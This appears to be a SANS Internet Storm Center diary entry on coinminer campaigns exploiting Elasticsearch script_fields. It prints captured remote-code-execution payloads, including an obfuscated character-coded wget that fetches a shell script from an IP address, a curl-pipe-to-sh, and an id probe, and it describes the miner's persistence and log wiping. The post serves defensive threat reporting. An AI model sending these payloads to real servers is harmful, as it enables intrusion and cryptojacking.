Threat Level: green Handler on Duty: Xavier Mertens

SANS ISC: CoinMiners searching for hosts - SANS Internet Storm Center SANS ISC InfoSec Forums

Participate: Learn more about our honeypot network

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
CoinMiners searching for hosts

We've seen the Elasticsearch being exploited using queries with script_fields for a while now, but we're seeing an increased activity. 

Attacks coming from are trying to exploit this vulnerability, and executing shell commands. We've seen the following exploits in the wild:

  • url /_search?pretty containing the payload and search query:
    "size":1, "script_fields": {"lupin":{"script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"wget -P /tmp/sssooo\").getText()"}}}
  • url /_search?pretty containing payload and search query:
    {"size":1, "script_fields": {"lupin":{"script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"curl -fsSL |sh\").getText()"}}}
  • url /_search?source containing payload and search query:
    {"query": {"filtered": {"query": {"match_all": {}}}}, "script_fields": {"exp": {"script": "import java.util.*;\nimport*;\nString str = \"\";BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(new String[] {\"/bin/bash\",\"-c\",((char)119+(char)103+(char)101+(char)116+(char)32+(char)104+(char)116+(char)116+(char)112+(char)58+(char)47+(char)47+(char)54+(char)57+(char)46+(char)51+(char)48+(char)46+(char)50+(char)48+(char)51+(char)46+(char)49+(char)55+(char)48+(char)47+(char)103+(char)76+(char)109+(char)119+(char)68+(char)85+(char)56+(char)54+(char)114+(char)57+(char)112+(char)77+(char)51+(char)114+(char)88+(char)102+(char)47+(char)117+(char)112+(char)100+(char)97+(char)116+(char)101+(char)46+(char)115+(char)104+(char)32+(char)45+(char)80+(char)32+(char)47+(char)116+(char)109+(char)112+(char)47+(char)115+(char)115+(char)115+(char)111+(char)111+(char)111).toString() }).getInputStream()));StringBuilder sb = new StringBuilder();while((str=br.readLine())!=null){sb.append(str+\"|\");}sb.toString();"}}, "size": 1}

Decoding the last exploit you'll get wget -P /tmp/sssooo. The name of the script_field lupin could be originating of one of  the initial exploits. The request is using the useragent python-requests/2.20.1.

The command will download and execute This bash script will kill and disable other miners, creates persistence using cron, add its own ssh public key to the .authorized_keys file and downloads the devtool (xmrig) and the config.json. Devtool is actually a (variant of) xmrig, a CoinMiner. If runs as root, files will be installed in /etc, otherwise in the /tmp folder. Now it will start the miner and configure iptables to drop ports 3333,5555,7777 and 9999. Those ports are being seen often to be used with Miner pools. When finished it will clean logs to wipe out evidence.

The same server has been targeting vulnerable Huawei devices before (/ctrlt/DeviceUpgrade_1) while trying to execute a script (

This host is also scanning for exploitable Elasticsearch instances (and also other vulnerable services). It tries to execute id to check if it returns the expected response.

  • {"size":1, "script_fields": {"lupin":{"script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"}}}


  • ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAuna/E/UUQaGkVWuD613/07snQnMGFpOq3HlK9SNAEgXt3WwOPCHX6buuDTizo1dZFSbAK7ung0Ff4sYSN11hNeafySGivNBsRVnZGTJweUGOvXHuevIxlnEghaJ387SBNXEJwJUNLjoWbsTsYPF5GDt4RUJiLq2hVRyUQpxTX6G8MQWJ5t8A0WMGRzwxwNr7acS8NwNZ7PtedmGyXWGAnyg3CD3YT0kO+IaiX4i2mtLGNYxniHc/RK5Ba3r8LzuWvOlgXb9rGuCvGHKml+fYjQFUmGQse9Sfyqglm+rrQVQefphgEU0DG9JXvufmybc6XYqcNJfJnGIU8pz4p0QS0Q==" 

If you have any data, let me know. 

Remco Verhoef (@remco_verhoef)
ISC Handler – Founder of DutchSec


26 Posts
ISC Handler
Nov 30th 2018

Sign Up for Free or Log In to start participating in the conversation!